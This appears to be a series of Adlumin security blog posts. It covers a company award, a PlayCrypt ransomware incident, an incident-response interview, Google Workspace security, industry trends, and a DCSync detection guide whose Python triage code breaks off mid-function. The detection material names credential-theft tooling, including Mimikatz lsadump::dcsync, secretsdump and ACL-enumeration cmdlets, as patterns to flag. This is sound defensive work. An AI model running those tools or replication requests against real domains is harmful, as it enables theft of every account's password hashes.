Adlumin Named to Prestigious Inc. 5000 List for the Third Consecutive Year

We’re excited to share that we’ve been named to the Inc. 5000 list ranking America’s fastest growing private companies. This is Adlumin’s third straight year on the list and our continued rapid growth propelled us to number 438. This ranking was fueled by an average median three-year revenue growth rate of 1,320%, which boosted our rank by more than 100 spots from the 2022 list.

Adlumin is focused on addressing the inequities that exist today between an organization’s size and its ability to effectively protect itself against the growing threat of sophisticated cyberattacks. For too long, only the world’s largest organizations – in both the public and private sector – have had the tools and resources needed to defend themselves. Our success over the past year and the steep growth trajectory we’ve maintained for the past several years are a testament to our mission and our amazing team’s ability to execute against it.

While the cybersecurity industry has discriminated, in many ways, against smaller organizations, cybercriminals have not. Growing and mid-market organizations (like many of our fellow honorees on the Inc. 5000 list) have personal and proprietary information and valuable operations to protect. These organizations are targeted by the same threat actors and with the same aggressive tactics as the world’s largest organizations.

“Adlumin is here to ensure organizations of all sizes have the capabilities they need to defend against any cyber threats they face. We’ve made significant strides to further that mission over the past year by continuing to enhance our security operations platform and most recently, with the launch of a new offering that makes incident response services affordable and attainable for organizations of all sizes,” said Robert Johnston, founder and CEO of Adlumin. “Our growth this year and our ranking among the top 10% of America’s fastest growing companies is a strong validation for the impact we’re having at our expanding list of partners and customers.”

For this year’s Inc. 5000 list, we join a class of honorees that have driven rapid revenue growth while navigating inflationary pressure, the rising costs of capital, and seemingly intractable hiring challenges. Among this year’s top 500 companies, the average median three-year revenue growth rate ticked up to an astonishing 2,238 percent. In all, this year’s Inc. 5000 companies have added 1,187,266 jobs to the economy over the past three years.

“Running a business has only gotten harder since the end of the pandemic,” says Inc. editor-in-chief Scott Omelianuk. “To make the Inc. 5000—with the fast growth that requires—is truly an accomplishment. Inc. is thrilled to honor the companies that are building our future.”

Thank you to Inc. Magazine for the gargantuan effort of pulling this list together. Thank you to our entire Adlumin team who make this company better and stronger every day. And most of all, thank you to our partners and customers for placing your trust in us. We’ll only get better and stronger from here.

For complete results of the Inc. 5000, including company profiles and an interactive database that can be sorted by industry, location, and other criteria, go to www.inc.com/inc5000.

PlayCrypt Ransomware Group Wreaks Havoc in Campaign Against Managed Service Providers

By: Kevin O’Connor, Director of Threat Research

Key Takeaways

  • The Adlumin Threat Research team uncovered a concentrated global campaign employing sophisticated Play ransomware (also identified as PlayCrypt). The campaign is currently targeting mid-market enterprises in the finance, software, legal, and shipping and logistics industries, as well as state, local, tribal and territorial (SLTT) entities in the U.S., Australia, U.K., and Italy. The PlayCrypt ransomware group was previously linked to the City of Oakland attack in March 2023.
  • Cybercriminals are directing their efforts towards the managed service providers (MSPs) of these enterprises, utilizing techniques such as remote monitoring and management (RMM) software as vectors or entry points into the targeted systems, which provides complete administrative access.
  • Additional attack vectors are Fortinet firewalls with 3–5-year-old vulnerabilities (CVE-2018-13379 and CVE-2020-12812), and other compromised software in the supply chain.
  • PlayCrypt ransomware’s code is highly obfuscated and shows strong resistance to typical analysis techniques. Notably, this ransomware group is the first to employ intermittent encryption – a technique that partially encrypts files in chunks of 0x100000 bytes to evade detection.
  • This article examines the tactics, techniques, and procedures (TTPs) of threat actors utilizing PlayCrypt, as mapped in the MITRE ATT&CK framework, and observed during an attack and subsequent investigation by the Adlumin MDR and Incident Response Teams.

Initial Access

Last month, in the wee hours of the night, a threat actor deploying PlayCrypt leveraged the Remote Monitoring and Management (RMM) software used by a service provider to gain direct access to a customer’s environment, bypassing the majority of its defenses.

RMM software serves as the central nervous system of modern-day service providers. It gives users unfettered, privileged access to networks so operators can deliver seamless support and IT operation functions to a distributed cohort of customers.

But the PlayCrypt ransomware group can utilize the same remote access capability to wreak havoc on mid-market firms.

The ransomware debuted in June 2022 and is strongly affiliated with the Balloonfly malware group. It employs double-extortion tactics, stealing victim data before encrypting their networks.

Recently, PlayCrypt expanded its toolkit with new tools and exploits such as ProxyNotShell, OWASSRF, and a Microsoft Exchange Server remote code execution vulnerability.

Aside from hackers using remote desktop protocol servers as a vector for network infiltration, they can also use FortiOS vulnerabilities (CVE-2018-13379 and CVE-2020-12812), and other compromised software in the supply chain.

In the incident involving PlayCrypt ransomware, Adlumin analysts believe there were at least two potential methods of intrusion. The first possibility is that the hackers gained access through compromised remote desktop software credentials. The second is that they may have exploited a vulnerability in the software itself.

Execution

Once inside the victim’s network, attackers move quickly to deploy additional tooling and exploits to gain a solid foothold on the system, including PowerShell scripts, Microsoft Server remote code execution exploits, and batch files.

Defense Evasion

Once exploits have given threat actors privileged (root-level) access, they begin creating admin-privileged accounts that can be used to disable security tools. For example, the Adlumin MDR team observed that the attackers modified the Windows registry to shut down Windows Defender after creating a privileged account.

Adversaries can also replicate the traffic patterns of legitimate users, thereby making it complicated for network security tools to discern between malicious and normal activities.

During the defense evasion stage, threat actors can also delete signs that they are in the system to throw off cybersecurity teams.

Credential Access

To evade detection, threat actors incorporate the use of tools such as Mimikatz to extract credentials. These compromised usernames and passwords are subsequently exploited to escalate privileges, execute lateral movement across the network, and facilitate data exfiltration.

Halting The Attack

The AI-powered Adlumin Security Operations platform successfully detected and stopped the malicious activity when PlayCrypt ransomware was used. The platform uses automated Security Orchestration, Automation and Response (SOAR) actions to isolate impacted endpoints, disable suspicious accounts, reset passwords, initiate scans, and more. As a result of these detections and SOAR actions, the MDR team immediately received notifications, investigated further, and took additional mitigation actions.

During the incident, the MDR team discovered and stopped data exfiltration processes through the FTP port that the hacker had initiated. The team also found malware executables hidden in temporary and system folders.

Command and control (C2) activity was also detected. This allowed an analyst to gather information on the hacker’s location through IP address and geolocation data.

Finally, analysts found that the hacker(s) also deleted volume shadow copies to prevent the customer from restoring from backups.

Incident Response

The Adlumin Incident Response (IR) team joined the investigation to take a deeper dive into the threat actor’s TTPs and examined the malware used through reverse engineering.

The IR team found that PlayCrypt ransomware’s code is highly obfuscated and shows strong resistance to typical analysis techniques. Notably, this ransomware group is the first to employ intermittent encryption – a technique that partially encrypts files in chunks of 0x100000 bytes to evade detection.

Once in a network, threat actors utilize “lolbins” binaries in the ransomware attacks. They distribute executables through Group Policy Objects, employing scheduled tasks, PsExec, or WMIC. Upon achieving full network access, they encrypt files with the “.play” extension.

Recommendations

  • Adlumin recommends that customers choose MSPs with strong security records and know-how for identifying and handling data breaches.
  • As for MSPs, we recommend the use of stronger credentials and the implementation of multi-factor authentication to prevent threat actors from taking advantage of RMM software.

The Adlumin Advantage

The combination of automated SOAR actions implemented by Adlumin’s Security Operations Platform and the rapid response of the MDR and Incident Response teams successfully thwarted the attacker’s advances. Had the hacker been successful, they would have held all of the customer’s sensitive data hostage through encryption, demanding a ransom.

With the threat neutralized, Adlumin strengthened its defenses, armed with valuable insights from the reverse-engineered PlayCrypt ransomware samples. The IOCs uncovered during the investigation now serve as a robust shield against future attacks, ensuring the protection of customer data and upholding Adlumin’s commitment to cybersecurity excellence.

Inside Incident Response: A Cybersecurity Expert's Take

By: Krystal Rennie, Director of Corporate Communications

In today’s rapidly evolving digital landscape, cyber threats lurk around every corner, making the role of a threat research team non-negotiable. Through continuous monitoring, proactive analysis, and timely dissemination of threat intelligence, threat research teams are tasked with fortifying defenses and empowering organizations to stay one step ahead of cyber adversaries.

In this blog post, we sit down with Kevin O’Connor, Director of the Adlumin Threat Research team, to discuss the team’s pivotal role, shed light on Incident Response, and explain how the team’s insights are essential in the ongoing battle against cyberthreats.

Kevin, please tell us more about your team’s role. 

The threat research team works to proactively identify threats that may have bypassed security controls. Another way to think about it is we look for new threats that have yet to be detected. Since they have yet to be detected, there are no rules to protect against these threats, like a specific new type of malware. The Adlumin Threat Research team looks specifically for these undetected threats so we can build defenses to identify those threats in the future.  

We’re also responsible for incident response for our customers. We work with customers when a breach has affected stored data or multiple systems and hasn’t been contained. The team works with our customers to do complete, end-to-end incident response, identify the root cause, and eliminate the threat.

Talk to us about the difference between investigation and incident response. 

An investigation analyzes a specific event that might have been triggered by a Managed Detection and Response (MDR) team or MDR software. An investigation looks at a particular event to see if it is malicious in nature, determine its disposition, and contain the threat from spreading.

Incident response is the step that comes after an investigation; it includes a deeper dive into the events, additional analysis, potential reverse engineering, and most importantly, eradicating the threat. Then incident response determines the breach’s root cause and overall impact on the business and its assets. It focuses on discovering how the threat got into your network, how long it was there, what it did, and how it bypassed the defenses.

What are the most common ways that attackers get in and what can customers do to protect themselves?

The most popular way attackers get in is through phishing or spear phishing emails.  

It’s the user who falls victim to these attempts and clicks the malicious link in their inbox, which either leads them to a fake login site where they enter their credentials (the attacker can then access the e-mail account and associated productivity tools like OneDrive, SharePoint and Word, where they can access files or add a malicious file), or, when users open infected attachments sent to them via email, the typical Word document or PDF with malware is added to kick off the attack. The other half of it is being redirected to sites that then do browser-based exploitation; the attacker exploits your web connection to an accessed link to be able to put malware down on your device. I think those are the two paths within. The human interface between you and the computer results in a lot of exploitation.

What adversary trends do you think we’ll see in the next year? 

I expect to see more examples of supply chain breaches that lead to compromise. We saw it earlier with the MOVEit vulnerability, during SolarWinds, and even before that there have been many examples of commercial software being used to attack the products’ customers. More advanced malware attackers look at supply chain compromises to enable attacks, especially widespread attacks and attacks against hardened targets.

What are easy ways to quickly identify if you are being attacked vs being breached? 

It’s important to realize that most organizations are being attacked daily. Those daily attacks might be script kiddies, but when we pull up any specific customer and look at their external network perimeter, we see attempts to get into any open services all the time, so the attacks are constant.

In an attack, you’ll often see many signs of failed entry or exploitation attempts against the customer. So, think about an account inside of a customer, let’s say the billing department, with access to all sorts of financial systems and billing data. If we see repeated phishing emails, maybe all using the same tactics, techniques, and procedures, to get that initial exploitation onto the victim’s machine, that might constitute an attack on your environment.

Whereas seeing things like excess connections from a specific host or something trying to reach back to your network is typically a sign of a breach. Other signs are actions taken on the network’s assets, like programs being installed, data being exfiltrated, or settings like security-relevant logging being changed.

What key items should be included in an Incident Response when a breach occurs? 

One of the most important parts that should be included in an Incident Response report is scope. Large-scale breaches can quickly reach numerous endpoints within your environment. You’ll need to know what network assets were compromised, what data was compromised, and what access the compromised users/systems have to the data. A timeline of infection and a timeline of exactly what was done, when, and how to contain it is also critical.

Another key part of the IR report is the root cause analysis that explains how the attackers got into your system so you can close the door and lock it. Time is spent to eradicate the threat and if you don’t close that door the adversary could come back the next day and do the same thing over and over again. Plus, another attacker could also find the same door and exploit it. 

What do you enjoy most about your role?  

I enjoy finding new threats that haven’t been detected before. I love finding a new piece of malware that hasn’t been identified yet. It’s like when a scientist discovers a new animal in the wild. They found a new species of bird or beetle or whatever and get to document exactly how it works, what it does, and how it fits into the ecosystem. There’s a lot of technical investigation involved.  

For example, when we uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry, we discovered the malicious malware used advanced techniques to evade detection such as deception, encoding, and encryption. The malware runs remote commands against victim networks after gaining initial access, execution, and persistence into servers.

It’s a big puzzle that you put together, especially when you’re doing reverse engineering. It’s almost like an art, and I enjoy it a lot.

Incident Response and the Adlumin Advantage 

Most IR firms use third-party tools and deploy them all over the environment to collect information and logs. A core capability of the Adlumin platform is that we have insight into all the logs and events for the past three months or more for our customers, so we don’t have to deploy additional technology.

The events are constantly being saved to a secure source, where attackers can’t really modify them. This is important because if you gather log sources after the attacker has disturbed the environment, the logs may have been poisoned. So, it’s hard to determine the truth. 

Since our agent is already collecting logs and events, even before an incident happens, a lot of the data is already safely stored and logged, which means we can cut down on incident response times and gives customers some savings while giving us an advantage in responding and catching attacks. 

To learn more about Adlumin’s Incident Response offering, download our datasheet today or contact one of our cybersecurity experts for a demo.

Black Hat Bound: Bet on Adlumin

By: Krystal Rennie, Director of Corporate Communications

As the cybersecurity industry gears up for one of the year’s most anticipated events, we look forward to winning big at the 2023 Black Hat conference. With years of innovation and cybersecurity expertise, Adlumin looks forward to being a part of Black Hat 2023. Below is a quick glimpse into a few things that attendees can expect:

  1. The Power of Partnership: Adlumin’s VP and Chief of Strategy, Mark Sangster, will speak on 5 Tips for Cybersecurity at KnowBe4’s booth #1820 on Thursday, August 10, 2023, at 1 pm PST. In this talk, Sangster will share his top five insights for Cyber Coaching Success. Discover practical strategies to foster a strong cyber hygiene culture among your employees and help them feel invested in safeguarding your company’s digital assets.
  2. Live Demonstrations: One of the highlights of Adlumin’s presence at Black Hat will be the live demonstrations of its award-winning platform and services. Attendees will witness firsthand how Adlumin’s security operations platform stops advanced cyber threats, eliminates vulnerabilities, and takes command of sprawling IT operations. These demos will illustrate the platform’s seamless integration into security infrastructures for organizations seeking proactive protection against cyberattacks.
  3. Adlumin’s New Dashboard: Black Hat attendees can anticipate an exclusive preview of our highly anticipated new dashboard. Built with intuitive interfaces and data visualization capabilities, the dashboard empowers security teams to analyze, respond to, and mitigate potential threats.

Embrace the Vegas Magic

As the industry gears up for the conference and Adlumin takes center stage, attendees will be presented with the opportunity to explore cutting-edge solutions and train in the fight against cyber threats.

So, mark your calendars and join us at Black Hat at booth #2269 on August 9-10, 2023. For more information about the Adlumin booth or presence, visit https://go.adlumin.com/blackhat-2023.

Securing Your Digital Footprint: Google Workspace

By: Massie Hussaini, Director of Application Engineering

As technology advances and cyber threats become increasingly sophisticated, businesses need powerful tools to safeguard their sensitive data and streamline their operations. In this era of remote work and digital connectivity, organizations in various industries like education rely heavily on Google Workspace to enhance productivity, foster effective communication, and streamline workflows.

The rapid adoption of cloud services has expedited digital transformation in organizations. With more data stored in the cloud, cybercriminals have shifted their focus to target cloud-based environments, and Google Workspace has become a prime target. Google Workspace serves as a centralized repository for a vast array of data, including emails, documents, spreadsheets, presentations, and other files.

A breach or unauthorized access to this repository can result in severe consequences for your organization, such as data theft, loss of intellectual property, and reputational damage. Regularly analyzing this data can help you detect any unusual activities or potential breaches in a timely manner.

In this blog, we will explore the 5 ways your organization can secure its digital footprint with Google Workspace while enhancing its security posture.

5 Ways to Secure Your Organization with Google Workspace

  1. Identify Unusual User Patterns: Credential theft is a popular attack among cybercriminals, and once a cybercriminal gains access to your credentials, the intrusion becomes increasingly hard to identify. It is important to monitor and track user activities in real time with User Entity & Behavior Analytics (UEBA), which allows you to detect and respond to anomalies and potential security threats as they happen.
  2. Reduce Risk Through Correlation: Integrating Google Workspace through its API lets organizations correlate user activity data with threat intelligence and other security signals. This provides early warning signs and actionable insights that help prevent and mitigate security incidents, and gives your organization full visibility into your network.
  3. Enable Access to Users: Take control of your organization’s security by defining and enforcing access policies within Google Workspace based on user roles, departments, or specific data types. This ensures that your organization’s sensitive information remains secure and accessible only to authorized personnel.
  4. Quickly Halt Attacker Activity: Enhance operational efficiency with automated security workflows that disable user accounts when a user is taking actions that appear suspicious. Integrating Google Workspace with security orchestration, automation, and response (SOAR) enables organizations to automate routine security tasks and responses, reducing manual efforts and accelerating incident response times.
  5. Improve Security Posture: Understand the state of your cloud security by pulling data from Google Workspace. Gain insights into things like when an admin adds or removes a user or when changes are made at the group level. These insights can provide details into policy violations and suspicious behaviors.

Consolidate your Security with One Platform, One License  

Taking a proactive approach to examine your Google Workspace data from a cybersecurity standpoint is not merely an option but a necessity in today’s digital world. By doing so, you can strengthen your organization’s security posture, protect valuable data, and ensure compliance with relevant regulations. Regular analysis empowers your IT team to respond swiftly to potential threats, reducing the risk of data breaches and the associated repercussions on your organization’s reputation and bottom line.

Adlumin empowers organizations with advanced threat detection, comprehensive security monitoring, streamlined incident response, and collaborative workflows both in the cloud and with legacy technology. Adlumin continues its mission to make security accessible to markets with few resources and limited budgets.

By enhancing our Google Workspace integration, industries like education can gain more visibility into their security posture. This integration not only fortifies cybersecurity defenses but also optimizes productivity and enhances collaboration, making it an indispensable solution for organizations aiming to safeguard their data and drive success in the digital era.

For more information on how Adlumin can integrate Google Workspace and other applications to illuminate your cloud environment, contact one of our security experts.

5 Cybersecurity Trends Still on the Rise

By: Brittany Demendi, Corporate Communications Manager at Adlumin

As summer begins to wind down and we hit the mid-year mark, it is becoming increasingly evident that the cybersecurity industry continues to experience transformational shifts. In the face of persistent threats and sophisticated attacks, businesses must adapt to the changes to strengthen their defense mechanisms.

Despite the various challenges brought forth by the ever-advancing technological world, one thing remains constant—cybersecurity’s critical importance in safeguarding our digital assets and personal information. As the digital landscape continues to evolve at an unprecedented pace, remaining vigilant is the key to staying ahead of the cybercrime curve.

This blog explores five key cybersecurity trends that are still on the rise, shaping the way we approach digital security and setting the tone for the months to come.

  1. Cybersecurity Spending: According to ESG research, 65% of organizations planned to increase their budgets this year. While budgets are tightening, cybersecurity spending is still on the rise. In the past few years, cybersecurity has become a boardroom topic. Cyber threats continue to impact organizations on a daily basis and the awareness of these issues is prevalent. Companies understand the criticality of keeping customer and business data secure and investment in cybersecurity has become non-negotiable and often needed for compliance.
  2. Cloud-Based Attacks: Organizations have adapted, from servicing customers through apps to employees working remotely, increasing the attack surface for adversaries. Most organizations store their data in the cloud and, as a result, cybercriminals are focusing on the cloud as the main target for attacks. The key to managing cloud risk is being able to identify when user activity deviates from normal patterns. This can be accomplished by investing in a solution with User Entity and Behavior Analytics that also ingests security signals from your productivity tools.
  3. Machine Learning Based Detections: To keep up with the sophistication and growing threat landscape, machine learning is becoming a key capability in cybersecurity. Machine learning goes beyond signature-based detection methods to identify the advanced tactics cybercriminals are leveraging to bypass detection. Embracing machine learning in cybersecurity solutions is a necessary step in staying ahead of ever-evolving cyber threats.
  4. Insider Threats: This emerging challenge is sometimes misunderstood. While it could be a disgruntled employee posting sensitive information, we’re referring to human error that occurs internally. According to VentureBeat, “one out of every five breaches, 19%, originate from the inside.” Whether it is an employee accidentally leaking password credentials or downloading malware without realizing it, not following security protocols leaves sensitive data at risk. Investing in security awareness training is essential to educating employees to better protect against this risk.
  5. Business Email Compromise (BEC) Attacks: BEC continues to be one of the top ways attackers steal information, achieve financial gains, and find their way into an organization. It works because it involves a human element. They trick and deceive users into taking harmful actions, sharing sensitive information or providing monetary gains. An AFP report also shared “evidence that BEC remains a problem, with 71% of organizations experienced an attempted or actual BEC attack in 2022. That’s up 3 percentage points from 2021, but still off the 2018 high mark of 80%.” Security professionals must focus on educating employees to gain awareness and recognize these techniques to defend against BEC attacks.

Command More Visibility

The trends above represent only a small portion of what the industry is up against and of the opportunities to take hold of. The key is to take all we know about cybersecurity and apply it fully to our current security programs. Knowledge is only the halfway point to winning the battle; implementing a proactive security approach is essential to defend against these common trends.

Amidst these escalating threats, Managed Detection and Response (MDR) providers play a pivotal role in defending organizations. Investing in a solution that provides full visibility across your environment, provides insight into policy violations, and takes a multi-layered detection approach that looks at your extended threat landscape will enable organizations to keep up with the latest trends. Investing in MDR can be an extension of your team and provide valuable threat insights to prepare for and protect against the evolving threat landscape.

Unraveling Cyber Defense Model Secrets: DCSync Attacks

By: Joshua Beach, Detection Engineer and Andrew Chapin, Threat Researcher

Welcome to the Unraveling Cyber Defense Model Secrets series where we shine a light on Adlumin’s Data Science team and explore the team’s latest detections and learn how to navigate the cyberattack landscape.

DCSync attacks are hard to protect against and are used often by cybercriminals who aim to take over your network. In this blog, we’ll walk you through the methodology, detection, and more. Let’s begin:

Domain control is a common intermediate goal in many cyberattack scenarios, including Advanced Persistent Threat (APT), Insider Threat, and Ransomware. Executing a Domain Controller Sync (DCSync) attack is a popular method for achieving domain control. Often reliant on the exploit tool Mimikatz, DCSync can also be performed with manual methods.

Methodology

A DCSync attack targets Windows Active Directory (AD).

In this type of attack, a threat actor targets a feature in AD called the domain controller (DC), which allows different parts of the network to share and synchronize data.

The domain controller is a high value target because it stores a secured database that contains sensitive information, such as user account records with usernames and password hashes.

During a DCSync attack, the threat actor attempts to trick the domain controller into sharing the user account information by utilizing the Directory Replication Service Remote (DRSR) protocol. This allows the threat actor to pretend to be another trusted domain controller that is part of the network.

A successful DCSync attack allows an attacker to steal sensitive account records from the database. The attacker will then try to crack the password hashes and gain unauthorized access to user accounts (including network admin or super-admin accounts) and gain more control over the network.

Detection

Adlumin has created a detection for DCSync Attacks that can recognize and alert on the methodology used by threat actors described above. This allows for quick mitigation and remediation for clients.

The starting point is the Windows Security log on each domain controller, specifically event ID 4662 (An operation was performed on an object). This event is written only when Audit Directory Service Access is enabled and the domain object's SACL audits the control access rights concerned, so verify the audit configuration before relying on the detection.

Next, events are filtered to those that actually exercise the replication rights. In a 4662 event these appear in the Properties field as the GUIDs of the extended rights: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) and 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Get-Changes-All is the right that returns secrets, so it is the one that matters most. The remaining events are examined for requests from accounts that should not be replicating.

The challenge is to sift out the benign activity in this subset.

The DRSR protocol is used primarily between domain controllers so that each one holds a current copy of the directory. Thus DC to DC replication is normal, while a replication request from a workstation or an ordinary member server, or one made under a user account rather than a DC machine account, is not.

Adlumin flags any DCSync request that does not originate from a domain controller as potentially malicious activity. A security team can then quickly identify and respond to threats against the domain controllers on the network.
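As an added example (not Adlumin's detection code), the following Python applies the filtering described above to a handful of constructed 4662 records: it extracts the replication-right GUIDs from the Properties field, drops requests made by known domain controller machine accounts or by an explicitly allow-listed account, and rates a request that exercises Get-Changes-All higher than one that only reads non-secret changes. The DC host names and the allow-listed account name are assumptions for the example.

```python
"""Added example (not Adlumin's detection code): flag DCSync-style replication
requests in Windows Security event 4662 records.

Events are modelled as dicts carrying the event's own field names
(SubjectUserName, SubjectDomainName, Properties, ObjectName, Computer);
the sample records below are constructed for the example.
"""
import re

# Extended-rights GUIDs that appear in the Properties field of event 4662
# when a caller exercises directory replication rights.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_FILTERED,
}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights(event):
    """Return the set of replication-right GUIDs present in the event's Properties."""
    found = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return found & REPLICATION_GUIDS


def is_dc_account(name, dc_hosts):
    """Machine accounts are 'HOST$'; treat one as a DC only if HOST is a known DC."""
    return name.endswith("$") and name[:-1].upper() in {h.upper() for h in dc_hosts}


def find_dcsync(events, dc_hosts, allowlist=()):
    """Return alerts for 4662 events that exercise replication rights from a
    principal that is neither a known DC machine account nor allow-listed.
    Get-Changes-All (secrets) is rated high; the other rights medium."""
    alerts = []
    allow = {a.upper() for a in allowlist}
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev)
        if not rights:
            continue  # some other directory operation, not replication
        user = ev["SubjectUserName"]
        if is_dc_account(user, dc_hosts) or user.upper() in allow:
            continue  # expected DC-to-DC replication or a vetted sync account
        alerts.append({
            "user": f"{ev['SubjectDomainName']}\\{user}",
            "dc": ev["Computer"],
            "severity": "high" if DS_REPLICATION_GET_CHANGES_ALL in rights else "medium",
            "rights": sorted(rights),
        })
    return alerts


# Constructed sample records: normal DC-to-DC replication, an assumed directory
# sync account that legitimately holds the rights, a user account pulling
# secrets, and an unrelated 4662 that touches no replication right.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "DC02$",
     "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=local",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES_ALL}}} {{{DS_REPLICATION_GET_CHANGES}}}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "MSOL_1a2b3c4d5e6f",
     "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=local",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=local",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES_ALL}}} {{{DS_REPLICATION_GET_CHANGES}}}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "svc-backup",
     "SubjectDomainName": "CORP", "ObjectName": "CN=Users,DC=corp,DC=local",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, dc_hosts=["DC01", "DC02"],
                             allowlist=["MSOL_1a2b3c4d5e6f"]):
        print(alert)
```

Run as-is it reports only the request from CORP\jdoe. Drop the allow list and the sync account is reported too, which is the behaviour you want on first deployment: every principal that holds the rights should be reviewed once, then allow-listed deliberately.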

Remediation View: 

The Problem

The DCSync attack methodology abuses the Directory Replication Service Remote (DRSR) protocol to obtain sensitive information from a domain controller. This functionality is not a bug; it is the mechanism by which the domain controllers in a multi-DC domain keep their copies of the directory consistent, and it cannot be switched off.

The technique involves an adversary masquerading as a domain controller and convincing an authentic DC to hand over directory data by issuing a replication request for the objects of interest. A successful DCSync attack gives the adversary the password hashes of the targeted accounts; because the attacker chooses which objects to request, this is usually every account in the domain, including krbtgt and the domain administrators.

The Algorithm

By using the associated logs resulting from actual DCSync attacks, Adlumin is able to filter on their defining characteristics to build detections. A few of these factors include user replication rights, if the requesting machine is a DC or not, and access rights. This rule-based detection scans every 6 hours for any new cases of this occurrence and will alert you for further investigation.

User Actions

When encountering an alert indicating that a domain user attempted a DCSync request, the objective is to determine whether the alert is an active threat or a false positive. But how?

Let’s remember that attackers rarely perform actions in isolation. Threat actors tend to chain together several steps. Therefore, we can check for other actions in tandem with the DCSync request.

Below is a list of items to check:

Verify User Account and Behavior

Verify that the user account was created legitimately and whether DCSync behavior is normal for that account in your network. This detection alerts on DCSync-related behavior, but some organizations back up domain controller data from non-DC hosts, and directory synchronization tools such as Azure AD Connect (its sync account is named MSOL_ followed by a hex string by default) legitimately hold the replication rights. If the account and its behavior are known and accepted within your network, disregard this alert and add the account to your allow list; otherwise treat it as an incident.

Domain Controller Syncing
Confirm whether the host that issued the request is a domain controller. Replication between domain controllers is generally benign, so a request from a DC that was not recognized as one (for example a newly promoted DC not yet in your inventory) is a likely false positive. A request from a workstation or member server is not.

Enumeration of Permissions
The attacker will often check which accounts hold the replication rights before performing the attack, typically by reading the ACL of the domain object (for example with Get-Acl on the AD: drive of the ActiveDirectory module, or with PowerView's Get-DomainObjectAcl). PowerShell script block logs (event 4104) containing those cmdlets, or LDAP reads of the domain's security descriptor from an unexpected host, are the traces to look for.

Exploit Command
To perform the attack, a program on the originating host must issue the replication request to the domain controller. Check process execution on that host (Security event 4688 with command-line logging enabled, or Sysmon event 1) around the time of the DCSync request and look for suspicious process execution: the Mimikatz lsadump::dcsync module, Impacket's secretsdump.py, or a renamed binary that still carries those arguments. Note that 4688 records the command line only if "Include command line in process creation events" was enabled beforehand.

Persistence
If the attacker has compromised a domain admin account, they may grant the replication rights to another account they control, so that the sync can be repeated later without the privileged account. Such a grant modifies the security descriptor of the domain object; with Audit Directory Service Changes enabled it is recorded as event 5136 with the attribute nTSecurityDescriptor, and the new SDDL value will contain the GUID of the right that was added. Look for such changes on the domain naming context around the time of the alert.

Network Traffic
Network monitoring is another effective way to discover a DCSync attack, and confirming whether the request came from a domain controller's IP address is fast and less prone to false positives than host-based correlation. The replication request is a DCE/RPC call to the DRSUAPI interface (UUID e3514235-4b06-11d1-ab04-00c04fc2dcd2), operation DsGetNCChanges (opnum 3). The stub data is encrypted with packet privacy, but the interface bind and the opnum are visible on the wire, so a Suricata signature can match on the interface and opnum and alert whenever the client address is not a known domain controller.

If the alert is confirmed as an attack:

  1. Quarantine the host and the account that issued the DCSync request.
  2. Identify which credentials were compromised; assume every account the attacker could have requested, including krbtgt.
  3. Reset the credentials. Reset krbtgt twice, allowing replication to complete in between, so that any forged Kerberos tickets stop validating.
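The checks above, as an added example (not Adlumin's triage logic): given a DCSync alert and the Security events collected from the domain controller and the originating host, this Python looks in a time window for the corroborating activity the checklist names: a DCSync tool on a process command line (Exploit Command), an ACL change on the domain object that adds the Get-Changes-All right (Persistence), a PowerShell script block that reads the domain ACL (Enumeration of Permissions), and a source address that belongs to a domain controller (Domain Controller Syncing). The DC inventory, the tool markers and all sample events are constructed assumptions.

```python
"""Added example (not Adlumin's triage logic): corroborate a DCSync alert
with nearby Security events, following the checklist above. Events are dicts
keyed by their Windows field names. The DC inventory, tool markers and all
sample events below are constructed assumptions for the example.
"""
from datetime import datetime, timedelta

# Assumed inventory of domain controllers (names and addresses).
DC_HOSTS = {"DC01", "DC02"}
DC_ADDRESSES = {"10.0.0.10", "10.0.0.11"}

# The extended right that returns secrets. If it shows up in a new ACE on the
# domain object, someone has just been handed DCSync capability.
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Command-line fragments of common DCSync tooling (Mimikatz module, Impacket);
# an assumed starter list. A renamed binary still carries these arguments.
TOOL_MARKERS = ("lsadump::dcsync", "secretsdump", "-just-dc")


def triage_dcsync(alert, events, window=timedelta(minutes=30)):
    """Return (verdict, reasons) for alert = {"time", "user", "source_ip"}."""
    # Domain Controller Syncing: DC-to-DC replication is expected traffic.
    if alert["source_ip"] in DC_ADDRESSES:
        return "likely false positive", ["source address is a known domain controller"]

    lo, hi = alert["time"] - window, alert["time"] + window
    reasons = []
    for e in events:
        if not lo <= e["time"] <= hi:
            continue
        # Exploit Command: process creation (4688 with command line, or Sysmon 1)
        # on a non-DC host that runs DCSync tooling.
        if e["EventID"] in (4688, 1) and e.get("Computer", "").upper() not in DC_HOSTS:
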